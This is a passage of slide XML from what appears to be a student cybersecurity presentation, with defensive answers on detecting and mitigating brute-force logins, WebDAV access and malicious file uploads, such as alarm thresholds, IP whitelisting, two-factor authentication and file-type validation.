                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Create a whitelist for authorized IP addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Change permissions frequently to make the folder private.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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423546"/>
            <a:ext cx="4298400" cy="3719904"/>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50" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>An alarm can be set to trigger if a predefined number of requests are issued to the server from a single IP address, especially if those requests result in unauthorized responses. Brute force attacks require a certain amount of time to complete, the traffic can be blocked before the password is guessed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>An alarm can be set to notify when hydra is used and there are multiple consecutive failed login attempts.</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>An appropriate threshold should be set for greater than 50 requests from a single IP address in the span of 30 minutes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>For multiple consecutive failed login attempts, the alert should trigger when the user are trying and has more than 3 or 5 consecutive authentication attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1423546"/>
            <a:ext cx="4298400" cy="3719954"/>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50" dirty="0"/>
              <a:t>What configuration can be set on the host to block brute force attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Use strong and complex usernames and passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Add progressive delays with unsuccessful attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Lock the device or set a lock up after multiple failed login attempts from the same IP address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>All the users in the company requires the two-factor authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Using CAPTCHA to define that it is not the machine input.</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>A very strong, unique and long passwords that consists of uppercase, lowercase, numbers and symbols.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Implemented a rule when multiple consecutive failed login attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Attackers will only be able to try a few passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Two-factor authentication requires an additional code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>CAPTCHAs prevents access by bots and auto tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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Mitigation: Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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access to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>An alarm should set to trigger if any access to WebDAV directory is made from outside the company’s internal network or a external IP address that is not in the network.</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p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>The alarm will be trigger when there is a user trying to access the WebDAV directory or upload of any files to the directory.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>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50" dirty="0"/>
              <a:t>What configuration can be set on the host to control access?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Using Apache’s configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" dirty="0"/>
              <a:t>n files to configure to deny ay WebDAV uploads by default and only a few of the specific IP addresses are allowed to upload the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" dirty="0"/>
              <a:t>Do not stored any instructions on how to access to the server that can be accessed by a web browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" dirty="0"/>
              <a:t>Update the software patches frequently or update it when there is a new version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" dirty="0"/>
              <a:t>Disable WebDAV or make sure it’s configured correctly.</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Monitoring the host machine by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0" err="1"/>
              <a:t>Filebeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t> (pre-installed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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kind of alarm can be set to detect future file uploads?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>An alarm can be trigger if invalid types are uploaded to the web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>An alert can be trigger if any port is open and any traffic that is trying to syn ack (shake hand) it. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The threshold should be set for each singular instance of a file uploaded to the server from the company’s external network or any IP addresses that is not in the internal network. If the file comes from the internal network and has a suspicious name such as “123456.php”, the alert should also trigger.</a:t>
            </a:r>
            <a:endParaRPr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572000" y="1425796"/>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50" dirty="0"/>
              <a:t>What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Block all the external network outside of the company to upload the files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Pick a special location of a device and store the uploaded files which is not easily accessible from the web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0" err="1"/>
              <a:t>anage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t> privileges of all the users to control access to sensitive files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Have the file type validated when posted to the server and block all executable files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Install antivirus for all the files to run through.</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>Validate the file to prevent extension spoofing that is used to hide the file type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050" dirty="0"/>
              <a:t>In conjunction with the sensitive folders on the server blocking executables, it will help to prevent further reverse shells from working.</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
